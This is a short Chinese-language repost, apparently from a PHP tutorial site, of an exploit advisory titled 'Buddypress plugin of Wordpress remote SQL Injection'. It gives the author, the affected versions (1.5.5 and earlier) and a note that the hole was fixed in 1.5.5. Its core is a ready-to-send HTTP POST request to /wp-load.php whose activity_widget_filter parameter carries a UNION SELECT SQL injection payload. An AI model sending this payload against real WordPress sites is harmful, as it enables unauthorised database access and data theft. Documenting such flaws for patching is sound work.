来源:自学PHP网 时间:2015-04-17 13:03 作者: 阅读:次
[导读] 标题: Buddypress plugin of Wordpress remote SQL Injection作者: Ivan Terkin类型: Remote Exploit漏洞: Remote SQL Injection软件下载地址: buddypress.org影响版本: 1.5.5及以下测试平台: ......
|
标题: Buddypress plugin of Wordpress remote SQL Injection
作者: Ivan Terkin 类型: Remote Exploit 漏洞: Remote SQL Injection 软件下载地址: buddypress.org 影响版本: 1.5.5及以下 测试平台: Buddypress 1.5.4 POST /wp-load.php HTTP/1.1 User-Agent: Mozilla Host: www.2cto.com Accept: */* Referer: http://www.2cto.com /activity/?s=b Connection: Keep-Alive Content-Length: 153 Content-Type: application/x-www-form-urlencoded action=activity_widget_filter&page=1%26exclude%3d1)and(1=0)UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17))%3b--+ 修复方案: 已经报告给官方并且在 1.5.5版进行了修复 |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
